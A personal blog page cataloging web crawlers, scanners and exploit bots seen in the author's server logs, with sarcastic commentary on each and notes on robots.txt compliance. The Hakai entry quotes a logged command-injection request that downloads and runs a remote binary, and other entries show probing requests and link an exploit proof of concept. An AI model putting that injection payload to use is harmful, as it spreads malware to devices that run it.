I Reckon This Must be the Place, I Reckon

Musings and doxings on Robots

Notes On Robots

MRU: 22 August 2022

Goto #thebotlist bookmark to skip the editorializing.

This lists software (code, tools, programs) that read (scan) multiple Websites.

Included are ALL automated code, whether a "Search Engine" or "malicious code" – I do not distinguish between the two. And there are many "in between" those two ends. If a classification were done, it might look like this:

  1. Search Engines – companies that index website content for people to search.
  2. Website Services – companies that index website content to sell services.
  3. White Hats – coders/people that index website exploits to list on their own website.
  4. Crackers – coders/people that just like (apparently) to break websites.

It's not "Hackers/Hacked", okay? The correct terms are "Crackers/Cracked". OKAY?

I block any robot that does not read robots.txt – all "Search Engine Optimization" services of any kind, and now all "White Hat" actors. I do this on principle. They, especially the latter two, ain't doing me any good (and they would use My Data for Their Ends only).

Sometimes a Bot uses someone else's code to do their Bot Shit; code like zgrab and httpx for example. And some do their Bot Shit in total isolation (nobody writes about them) like Alittle Client, Hello, [Ww]orld and the new 0xAbyssalDoesntExist.

I do not block many known exploits. Why? I ain't got any exploitable code on my website! (More on why I can make that claim elsewhere.)

I do block some file requests known to be exploitable, such as any request with "wp" or "admin" in the URI, though just to reduce traffic.

The Bot names here are usually the entire User-Agent string but I might not be always exact. (Many do not adhere to any particular format, though "BotName/VERS; URL" is most common.)

The order of the Robots listed here started (bottom up) randomly. Now the list grows top down with lastest discovered first.

Other Resources

  1. https://raw.githubusercontent.com/matomo-org/device-detector/master/Tests/fixtures/bots.yml; A long list of Bot names and metadata.

Thebotlist

wp_is_mobile

I have been igoring that one for a long time, as it's, well, I dunno. Just a run-o-the-mill Wordpress exploiter. So it's docxd here for S&G – wp_is_mobile log.

Qwantify/1.0 +https://www.qwant.com/

Does read robots.txt.

Why havn't I doxd this before? (I'm slow...)

"Wondering who uses Qwant? We do too."

X'lent! A search engine with a sense of humor!

"The search engine that doesn't know anything about you Zero tracking of your searches. Zero sale of your personal data."

React.org

Does read robots.txt but does not adhere to it...

Calling themselves "The Anti-Counterfeiting Network":

"Supporting members in their anti-counterfeiting strategies by providing customs – online – and market enforcement services at non-commercial fees."

"To support activities to protect all rights holders, consumers and governments against the negative consequences of the trade in counterfeited goods."

RestSharp/107.3.0.0

Yet another HTTP library.

It's been trying for variations of "/adminer.php". WTF? and, lately, "/.git/config". frack

"Probably, the most popular REST API client library for .NET."

Okay. Yeah. Sure.

Screaming Frog SEO Spider/8.1

Just seen and only one request for root, so, we'll see...

Hakai/2.0

Just seen. An exploiter attacking "/login.cgi":

"/login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$"

Yes, a WTF?

serpstatbot/2.1 (advanced backlink tracking bot; https://serpstatbot.com/; abuse@serpstatbot.com)

Does read robots.txt. Seems to be a heavy reader.

"...crawls the web to add new links and track changes in our link database. We provide our users with access to one of the largest backlink databases on the market for planning and monitoring marketing campaigns."

Frack! Not another one! Oh, and really?:

"Does the bot crawl links with the rel = nofollow attribute? Yes, it scans."

RepoLookoutBot/1.0.0 (abuse reports to abuse@repo-lookout.org)

Does not read robots.txt. (And they identify as a Robot!)

"Repo Lookout is a large-scale security scanner, with a single purpose: Finding source code repositories, that have been accidentally exposed to the public and reporting them to the domain’s technical contact."

Tried every directory for ".git" shit. Yet another useless "We are here to help," Bandwidth waster. ("Directory" being like "/word/" in a URL, and they try "/word/.git/HEAD", etc.)

project_patchwatch

Does not read robots.txt. Been doing these:

"\x16\x03\x01" 404
"GET / HTTP/1.1" 200

"...group of students at Esslingen University scanning the internet to gain insights into network security. If u want us to stop scanning your IP range, get in touch with us [email]..."

robots.txt! ROBOTS.TXT! ROBOTS DOT TEXT!!! sheesh

InfoTigerBot/1.9 +https://infotiger.com/bot

Does read robots.txt.

The "Independent, privacy respecting search engine". Looks very... inviting.

"More than 30 years after the World Wide Web first saw the light of day at CERN, only very few search giants determine the results of all of our web search."

Wow.

"... we neither collect user data nor do we track users. For us – a matter of course."

Cool. In fact, they look like a "Very Good Thing!" (I never make recommendations, but InfoTiger merits a very close looking into.)

Applebot/0.1 +http://www.apple.com/go/applebot

Does read robots.txt.

Why haven't I see these guys before? Weird. They can't be new.

SeznamBot/3.2 +http://napoveda.seznam.cz/en/seznambot-intro/

Does read robots.txt.

"Seznam.cz is a Czech on-line company running, besides other services, the web portal Seznam.cz, which is the first place of choice for millions of Internet users from the Czech Republic."

Okay.

BW/1.1 bit.ly/2W6Px8S

Does read robots.txt.

"The BuiltWith system visits a website to determine the technology profile it is using by looking at the publicly visible code on a website."

"Millions of people benefit from understanding how websites are built using BuiltWith's free technology profile lookup tool."

While that seems like BS, I'll give them the benefit of the doubt as they play nice.

yacybot http://yacy.net/bot.html

Does read robots.txt.

"YaCy is free software for your own search engine."

Interesting. But they have requested only a single URI here, and one that has been gone for years (but one that is still linked to on some websites...).

0xAbyssalDoesntExist

Only POSTs to "/editBlackAndWhiteList" which is maybe a hardware CVE or something.

That URL/URI can be seen in this code: raw.githubusercontent.com/mcw0/PoC/master/TVT-PoC.py, which is some kind of Exploit code...

And, of course, it can be found in many a Website's online Server Logs. (Why do people do that? It servers no purpose. sigh)

The website greynoise.io lists this several times – but looking at their meta data results in more confusion.

httpx Open-source project (github.com/projectdiscovery/httpx)

Does not read robots.txt.

What they say:

"httpx is a fast and multi-purpose HTTP toolkit allows to run multiple probers using retryablehttp library, it is designed to maintain the result reliability with increased threads."

Okee fine. But why are you reading my stupid little website? Oh, and what they say? Smells like plain 'ole horse hockey pucks.

NihilScio Educational search engine - +https://www.nihilscio.it/NihilScio.htm

Seen just three times, three days in March... They are what they say they are.

dwf-web-archive

Since seen only twice and for an outdated link, this might not be a robot. And nobody else has that string in any webpage... I'll keep it here for S&G.

NsToolsBot/analyse

Does read robots.txt.

Only 5 hits this year. Another "can't be found by Web Search" Bot. (Why, really, do people place web server logs in the public shpere? It makes zero sense.)

Bytespider https://zhanzhang.toutiao.com/

Does read robots.txt. Aka bytedance.

I can't read Mandarin...

CATExplorador/1.0beta (sistemes at domini dot cat; https://domini.cat/catexplorador/)

Does not read robots.txt. But only seen a few times this month. Spain.

fluid/0.0 +http://www.leak.info/bot.html

Does read robots.txt.

An "Internet Marketing Research" company. I (do) like how they say of their Web hosting company: "The people there are wise and nice."

serpstatbot/2.1 (advanced backlink tracking bot; https://serpstatbot.com/; abuse@serpstatbot.com)

Does read robots.txt.

"We provide our users with access to one of the largest backlink databases on the market for planning and monitoring marketing campaigns."

Huh? What's a backlink? Wait. Don't tell me. I don't want to know.

HTTP Banner Detection (https://security.ipip.net)

Does not read robots.txt. Only reads "/".

"For network security research, we need to obtain the IP location Banner and fingerprint information, we detecting the common port openly or not by ZMap, and collecting opened Banner data by our own code. Any questions please do not hesitate to contact with us: frk@ipip.net."

Ok. But not! [A Chinese company that needs a better English translator.]

go-resty/2.6.0 (https://github.com/go-resty/resty)

Does not read robots.txt. Aka. MAndroid.

Only reads "/". (Likes to give HEAD.)

Two in one! First seen March, 2022. HEAD with the "go-resty", followed immediately by a GET with "MAndroid". WTF? Just seen so I'll wait for more before wasting my time on them.

Fuzz Faster U Fool v1.3.1

Does not read robots.txt, but, since the code is a tool "to discover potential vulnerabilities", they will say, "We are not a Spider, Luser..."

On Github.

Nmap Scripting Engine https://nmap.org/book/nse.html

Great. Nmap has a Scripting Engine. (The NSE ain't knew, it's just someone using it has decided to tell us that he/she/they has/have automated it and it found this stupid little website. sigh)

Oh, see https://nmap.org/p51-11.html for how it started.

webprosbot/2.0 (+mailto:abuse-6337@webpros.com)

Does not read robots.txt.

What they say:

"WebPros delivers the most innovative technologies to enable the digital world. We bring together products and solutions to enable businesses to build, operate, and grow online. Our products help manage servers, websites, billing, and online marketing."

Not another one!

They say their brands include cPanel and Plesk. But why are they automating reading other people's websites?!?!

Dalvik/2.1.0 (Linux; U; Android 9.0; ZTE BA520 Build/MRA58K)

Does not read robots.txt.

Dalvik is an Android App, a Java Virtual Machine (as most search results indicate). That is as far as I went in research. (Slowly seeing more from them.) Why I initially placed it here was that the UA is formatted as if a Robot...

Mozilla/5.0 (compatible; Wappalyzer)

Does not read robots.txt.

What they say:

"Find out the technology stack of any website. Create lists of websites that use certain technologies, with company and contact details. Use our tools for lead generation, market analysis and competitor research."

Way cool! (Not.) More bandwidth wasting. sigh

deepnoc https://deepnoc.com/bot

Does read robots.txt.

Some kind of search engine "helper" or something; but looks interesting.

Pandalytics/1.0 (https://domainsbot.com/pandalytics/)

Does read robots.txt.

What they say:

"The most ccTLD-friendly Name Suggestion on the market. DomainsBot’s name suggestion is optimized to help meet your customers’ demand for local domains."

"Get a full picture of the domain and hosting market, discover better business opportunities and generate higher revenue."

Such dredge! Yet another waste of bandwidth.

Project-Resonance (http://project-resonance.com/)

Does not read robots.txt.

What they say:

"Internet wide surveys to study and understand the security state of Internet as well as facilitate research into various components / topics which originate as a result of our surveys."

Aw fuck. Yet another "White Hat" trying to protect me from myself. sigh

Further self-justifuckencation shit from them:

"You are visting this page most probably because you saw this url in your logs. Well, nothing to worry. So, what Happened?"

"You recieved a [sic] innocent HTTP request from one of our distributed research engine as a part of Project Resonance. We perform internet-wide security research and send non-malicious and non-intrusive requests for the same. We take special care of making sure no systems are negatively affected because of our scans."

I like (not) how they use the word "innocent".

And then there is this:

"And if you would not like any of our further probes, please drop us an email at [email protected]. Please make sure that you include the list of IP Addresses / IP Ranges which you would like to get excluded. Once we hear from you, we will simply put your IP Ranges on our exclusion list and you will never see any probe from us."

No, there is something called "Robots Exclusion Standard". (And the "[email protected]" thing means THEY DO NOT WANT BE SCANNED NEEDLESSLY! Needs Javascript enabled to display the address. It's a Cloudfare, /cdn-cgi/l/email-protection thing...)

Not needed. Not wanted. Thank you very much. Go the fuck away!

archive.org_bot http://archive.org/details/archive.org_bot

Does read robot.txt.

This is the "Internet Archive" bot; aka "Wayback Machine".

ArchiveTeam ArchiveBot/20210517.c1020e5 (wpull 2.0.3)

Does not read robots.txt. They will claim that they are not a spider, but they are.

What they say:

"HISTORY IS OUR FUTURE"

"And we've been trashing our history."

Really?!?! (But actually, WTF does that even mean?!?!)

"Archive Team is a loose collective of rogue archivists, programmers, writers and loudmouths dedicated to saving our digital heritage."

They have much more to brag about... They also say, via their wiki:

"ArchiveBot is an IRC bot designed to automate the archival of smaller websites (e.g. up to a few hundred thousand URLs). You give it a URL to start at, and it grabs all content under that URL, records it in a WARC file, and then uploads that WARC to ArchiveTeam servers for eventual injection into the Internet Archive's Wayback Machine (or other archive sites)."

So, how did they get to my pathetic, always changing, stupid little website? My shit does not need these kinds of "services", thank you very much.

DuckDuckGo-Favicons-Bot/1.0 http://duckduckgo.com

I've been blocking all favicon draggers for a long time. (How they got to my website is a longer story, not yet finished...)

masscan/1.3 (https://github.com/robertdavidgraham/masscan)

Does not read robots.txt. But they will say, "We are not a spider, Luser."

They do say they are a "TCP port scanner" that:

"... spews SYN packets asynchronously, scanning entire Internet in under 5 minutes."

Sounds cool. Not.

And why me? Oh...

"It can also complete the TCP connection and interaction with the application at that port in order to grab simple "banner" information."

Scanners! Analizers! SEOs! Oh my! When are these fucking people going to stop! Not necessary here! Stop stealing my bandwidth! Stop slowing the Internets to a crawl!

Gather Analyze Provide https://gdnplus.com

Does not read robots.txt.

"Global Digital Network Plus scours the global public internet for data and insights. To accomplish this, GDNP sends packets to all IPv4 IP addresses. While far within legal boundaries, sometimes our benign research initiatives are mistaken for malicious network reconnaissance. If you are interesting in removing your organization’s IP space from within our scope, please send us an email at contact@gdnplus.com."

I have to ask you to remove my "organization’s IP space from" your scope? Oh, please.

ThinkChaos/0.3.0 In_the_test_phase,_if_the_ThinkChaos_brings_you_trouble,_please_add_disallow_to_the_robots.txt._Thank_you.)"

Does not read robots.txt (kind of ironic, donchta think?).

zgrab/0.x

Does not adhere to robots.txt. (I am positive, that if you ask them, they will say, "We are not a spider, Luser"...)

From their gitshit, I mean github:

"ZGrab is a fast, modular application-layer network scanner designed for completing large Internet-wide surveys. ZGrab is built to work with ZMap (ZMap identifies L4 responsive hosts, ZGrab performs in-depth, follow-up L7 handshakes). Unlike many other network scanners, ZGrab outputs detailed transcripts of network handshakes (e.g., all messages exchanged in a TLS handshake) for offline analysis."

That's a huge WTF as that all is techobabble.

From https://linuxsecurity.expert/tools/zgrab/:

"ZGrab is commonly used for penetration testing, security assessment, or vulnerability scanning. Target users for this tool are pentesters."

Okay, but why my website? And here's the shit they requested this month (most root requests removed):

192.241.211.247 - - [21/Dec/2021:01:08:42] "GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application HTTP/1.1" 404 - "-" "Mozilla/5.0 zgrab/0.x"
192.241.213.212 - - [21/Dec/2021:01:19:58] "GET /owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f HTTP/1.1" 404 - "-" "Mozilla/5.0 zgrab/0.x"
192.241.210.245 - - [21/Dec/2021:16:56:06] "GET /login HTTP/1.1" 404 - "-" "Mozilla/5.0 zgrab/0.x"
192.241.214.219 - - [21/Dec/2021:22:48:36] "GET /owa/auth/logon.aspx HTTP/1.1" 404 - "-" "Mozilla/5.0 zgrab/0.x"
192.241.212.44 - - [21/Dec/2021:22:52:41] "GET /owa/auth/x.js HTTP/1.1" 404 - "-" "Mozilla/5.0 zgrab/0.x"
192.241.213.164 - - [21/Dec/2021:22:56:24] "GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application HTTP/1.1" 404 - "-" "Mozilla/5.0 zgrab/0.x"
192.241.211.102 - - [21/Dec/2021:23:37:55] "GET /actuator/health HTTP/1.1" 404 - "-" "Mozilla/5.0 zgrab/0.x"

Not exactly looking like "good guys," eh?

CensysInspect/1.1 +https://about.censys.io/

Does not adhere to robots.txt.

What they say:

"Your cloud is bigger, wider, and more vast than you know; your internet assets innumerable. Censys is the proven leader in Attack Surface Management by relentlessly searching and proactively monitoring your digital footprint far more broadly and deeply than ever thought possible."

They go on with their bullshit:

"Censys ASM provides a comprehensive profile of the IT assets on the internet, we empower defenders....."

Two things: Who are they fooling and why do they access my pathetic little website?

They also do a request without a user agent string, which is a 400. Then they immediately make a request with their UA; which gets 'em a 403...

Linux Gnu (cow)

Does not adhere to robots.txt, but probly not a spider..

Just gets root about 20 times per month, from two IP addresses.

Funny, since first seen months ago, no one seems to have written about this... Whatever it is.

(But one will see many "hits" as oh so many people/sites make their server log files public. Why would anyone do that? Who/What does that help?)

Oh, here's one other hit: https://threat.gg/attackers/9afa91cc-e147-4527-b487-7e290a184f92. But that, while they have a Website that is really well designed, simply displays a single request's data as Json, it's lamer than this...

Linespider/1.1 +https://lin.ee/4dwXkTH

Does adhere to robots.txt. (Redirects to https://help2.line.me/linesearchbot/web/.)

"Linespider is a Web crawler that provides a wide range of search results for LINE services..."

WTF is/are "LINE services"? Then I realized that, lin.ee/ is the Bot for line.me/, a Japanese messaging App.

"LINE has grown into a social platform with hundreds of millions users worldwide, having a particularly strong focus in the rapidly advancing continent of Asia."

Why they need a Bot, though, they do not say.

Baiduspider/2.0 +http://www.baidu.com/search/spider.html

Does not adhere to robots.txt.

While sometimes called the "Google of China," they are very annoying as not only do not read robots.txt they also sometimes mis-identify themselves.

FlfBaldrBot/1.0

Does not adhere to robots.txt.

I almost missed this one. It was in the "ssl_log" log file for last month... A duckduckgo search resulted in:

Not many results contain flfbaldrbot
debilsoft IP-Logger PRO Web analytics
[Search domain debilsoft.de] debilsoft.de/ip_logger_pro/iplog_us.php?action=show
[MAP] [Wiki] United States. 64.227.120.48. FlfBaldrBot/1.0.

No more results found for FlfBaldrBot.

Funny thing about the one hit – "IP-Logger PRO; visitor data & web analystics" – it is dynamically generated so my visit did not see that bot in their logs. debilsoft's logger page is well formed and easy to read. Kinda nice.

NetSystemsResearch netsystemsresearch.com

Does not adhere to robots.txt.

Their UA is the actual string below.

"NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com."

From their main page:

"Net Systems Research is an independent research organization focusing on a range of topics in internet security including IoT Proliferation, Zero Trust Networking, Network-Level Security, Cyber Risk Modeling and External Network Security Measurement. We focus on surveying and analyzing real world network systems to better understand and study challenging internet security problems. Through our research, we hope to improve the current understanding of the global internet’s security and promote better network security practices."

Wow! That's bold! But is just marketing bullshit? You betcha!

What really bugs me about these kinds of "We are here to help!" websites is:

  1. They do not adhere to the robots.txt standard – it's a "Standard."
  2. They say "If you would like your IP ranges or domains to be excluded from our studies, please contact us at abusedepartment@netsystemsresearch.com with the IP ranges and/or domains and any associated ownership information that is relevant to processing your request."
  3. Number 2 is a big "Fuck You you arrogant jerks," from my view. I run static, non-services websites, and I do not need anyone's "help" to run them.
  4. Since they do not adhere to such a basic web standard as robots.txt, how can they be trusted for anything?

DataForSeoBot/1.0 +https://dataforseo.com/dataforseo-bot

Does adhere to robots.txt. A pay for SEO.

From their main page:

"Powerful API Stack For Data-Driven Marketers."

"We provide comprehensive SEO and digital marketing data solutions via API. Everything your SEO software requires — in one place."

Ah, no.

InfoTigerBot/1.9 +https://infotiger.com/bot

Does adhere to robots.txt.

Search engine.

"Independent, privacy respecting search engine... A text only search engine, covering two languages (English+German)."

ZoominfoBot (zoominfobot at zoominfo dot com)

Adheres to robots.txt.

From their main page:

"Don’t just go to market, own your market."

"Accelerate your pipeline with ZoomInfo’s portfolio of solutions that combine B2B intelligence & company contact data with engagement software, and dynamic workflows."

"Uncover opportunities within your market by understanding how to engage active buyers."

"Pump the richest B2B data into your tech stack or take advantage of ZoomInfo’s fully-loaded suite of applications to reach your buyers faster."

From their FAQ:

"ZoomInfo is used by salespeople, marketers, and recruiters to optimize their lead generation efforts by providing them access to a vast business contact database and numerous sales intelligence and prospecting tools."

Who buys this dredge...

Twingly Recon-Klondike/1.0 (+https://developer.twingly.com)

Does not read robots.txt.

A Search API:

"Twingly Blog Search API is a commercial XML over HTTP API that enables machine access to Twingly’s blog search index."

It is very interesting. From their Terms of Use:

"Twingly is a Search Engine for Conversational Media such as Blogs. Our API and Widgets are free for personal use, and we offer paid licenses for commercial use. You can use Twingly Widgets without registering, but in doing so you accept these terms of use."

But they do not seem to have any – as my logs show – support for robots.txt. Their main page is full of dredge like:

"We keep track of updates from millions of online sources like blogs, forums, news, etc. Our focus is a broad coverage that includes all significant sources in each country. Through our easily integrated APIs, you get access to all that social data at your fingertips!"

My fingers just blocked you!

Mail.RU_Bot/2.0 +http://go.mail.ru/help/robots

Adheres to robots.txt.

They have been around for a long time. And I have no idea what they do.

DotBot/1.2 +https://opensiteexplorer.org/dotbot; help@moz.com

Does adhere to robots.txt.

Redirects to https://moz.com/link-explorer, which says:

"Enter the URL of the website or page you want to get link data for. Create a Moz account to access Link Explorer and other free SEO tools. Get a comprehensive analysis for the URL you entered, plus much more!"

I think not! Plus much more!

Googlebot/2.1 +http://www.google.com/bot.html

I no longer use Google for searches. Hover over their generated links and Google LIES! They do not reflect the true URL, as all of them go directly to Google with a ton of META data they use to track you before redirecting to the actual result. That is DISHONEST.

CCBot/2.0 https://commoncrawl.org/faq/

Adheres to robots.txt.

"We build and maintain an open repository of web crawl data that can be accessed and analyzed by anyone."

hrankbot/1.0 +https://www.hrank.com/bot

Does not read robots.txt.

"Which web hosting is better? We rank 300 Shared Web Hosting Providers by Uptime, Response Time and other features. Now we know for sure!"

Yer blocked fer sher!

Barkrowler/0.9 +https://babbar.tech/crawler

Adheres to robots.txt.

"Using Babbar, SEO gets easier."

"Thanks to Babbar’s data and metrics, uncover the strengths and weaknesses of your site and its competitors."

"Babbar helps you set up truly effective link building strategies thanks to its understanding of link and page semantics."

sigh Where do these people come from? Marketing 101 I guess. (Which just means the BS is good looking.)

ips-agent

Adheres to robots.txt.

No one seems to know who/what they. Verisign hosted. Many "IPS Insurance Agent" related pages. Could also mean Intrusion Prevention Systems. It's a WTF?

MegaIndex.ru/2.0 +http://megaindex.com/crawler

Does, does not adhere to robots.txt.

Web Search.

[18/Oct/2021:23:47:20] "GET / HTTP/1.1" 200 11585 "-" "Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)"
[18/Oct/2021:23:47:22] "GET /robots.txt HTTP/1.1" 200 26 "-" "Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)"

They get the root page and THEN get robots.txt. WTF? (But that could be an Apache thing.)

SEOkicks +https://www.seokicks.de/robot.html

Does adhere to robots.txt.

Ditto.

Adsbot/3.1 +https://seostar.co/robot/

Does adhere to robots.txt.

I have zero need, and less tolerance for, "SEO" Bots and their shady services.

Sogou web spider/4.0 (+http://www.sogou.com/docs/help/webmasters.htm#07

Does adhere to robots.txt.

Dataprovider.com

Does, does not, adhere to robots.txt. Again, why get root and THEN get robots.txt?

[18/Oct/2021:09:48:07] "GET / HTTP/1.1" 200 11585 "-" "Mozilla/5.0 (compatible; Dataprovider.com)"
[18/Oct/2021:09:48:10] "GET /robots.txt HTTP/1.1" 200 26 "-" "Mozilla/5.0 (compatible; Dataprovider.com)"

(I did think Apache "log issues" but by three seconds? I don't know.)

More dredge:

"Dataprovider.com transforms the internet into a structured database of web data. Our technology produces rock-solid insights today to empower your decisions for tomorrow."

"Start your free trial"

No thanks.

AhrefsBot/7.0 +http://ahrefs.com/robot/

Does adhere to robots.txt.

An SEO for paying customers to keep tabs on their own website. Therefore, they have no reason to crawl my websites.

"ahrefs is an All-in-one SEO toolset, with free Learning materials and a passionate Community & support"

"AhrefsBot is a Web Crawler that powers the 12 trillion link database for Ahrefs online marketing toolset. It constantly crawls web to fill our database with new links and check the status of the previously found ones to provide the most comprehensive and up-to-the-minute data to our users.

"Link data collected by Ahrefs Bot from the web is used by thousands of digital marketers around the world to plan, execute, and monitor their online marketing campaigns."

DomainStatsBot/1.0 (https://domainstats.com/pages/our-bot)

Does adhere to robots.txt.

Microsoft Office/14.0 (Windows NT 6.1; Microsoft Outlook 14.0.7143; Pro)

Does not read robots.txt.

Seen last week for the first time and just one GET / HTTP/1.1. Weird.

Expanse https://expanse.co/

Does not read robots.txt..

This is their new UA:

"Expanse indexes customers\xe2\x80\x99 network perimeters. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com."

Was recently this:

"Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com"

And first seen as this:

"Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"

Wow and WTF!

(I like how badbot.itproxy.uk says: "I'm not one of their customers, so why are they all over my websites like a rash?")

Oh, and their website says Expanse "protects around 10% of the overall Internet."

Yeah, right...

ALittle Client

Does not adhere to robots.txt.

All requests are for Wordpress exploits.

ThinkChaos/0.3.0 +In_the_test_phase,_if_the_ThinkChaos_brings_you_trouble,_please_add_disallow_to_the_robots.txt._Thank_you.

Does not adhere to robots.txt despite what it says.

Gets just "/" so far. Has footprints on the web as a developer(s) on Github and Stack Overflow. Saw this: "I just noticed a new user-agent string called ThinkChaos out of Tencent IP..."

A WTF as far as I can see.

SemrushBot/7~bl +http://www.semrush.com/bot.html

Does adhere to robots.txt.

This is a weird one. Just gets a few pages over and over all month long, using a ill-formed URL. Still trying even after a few weeks of 404's.

PetalBot +https://webmaster.petalsearch.com/site/petalbot

Does adhere to robots.txt.

A search engine owned by Chinese telecom Huawei.

MJ12bot/v1.4.8 http://mj12bot.com/

Does adhere to robots.txt.

BLEXBot/1.0 +http://webmeup-crawler.com/

Does (lately not) adhere to robots.txt. Pay for SEO...

"The BLEXBot crawler is an automated robot that visits pages to examine and analyse the content, in this sense it is similar to the robots used by the major search engine companies."

Um, okay, but:

"BLEXBot assists internet marketers to get information on the link structure of sites and their interlinking on the web, to avoid any technical and possible legal issues and improve overall online experience. To do this it is necessary to examine, or crawl, the page to collect and check all the links it has in its content."

Not mine.

MojeekBot/0.10 +https://www.mojeek.com/bot.html

Does adhere to robots.txt.

Bytespider https://zhanzhang.toutiao.com/

Does adhere to robots.txt.

Since it is all in Mandarin, I can't tell what they do.

The phpbb.com community does not like this one.

SEOkicks +https://www.seokicks.de/robot.html

Does adhere to robots.txt.

What they say:

"SEOkicks continuously collects link data with its own crawlers and makes them available via website, CSV export and API. The current index comprises more than 200 billion link data records."

Yawn.

DotBot/1.2 +https://opensiteexplorer.org/dotbot

Does adhere to robots.txt. Redirects to https://moz.com/link-explorer.

"Your All-In-One Suite of SEO Tools The essential SEO toolset: keyword research, link building, site audits, page optimization, rank tracking, reporting, and more."

Yeah, whatever. But, ah... Why?

YandexBot/3.0 +http://yandex.com/bots

Does adhere to robots.txt.

Search Engine

"Yandex is a technology company that builds intelligent products and services powered by machine learning. Our goal is to help consumers and businesses better navigate the online and offline world. Since 1997, we have delivered world-class, locally relevant search and information services. Additionally, we have developed market-leading on-demand transportation services, navigation products, and other mobile applications for millions of consumers across the globe."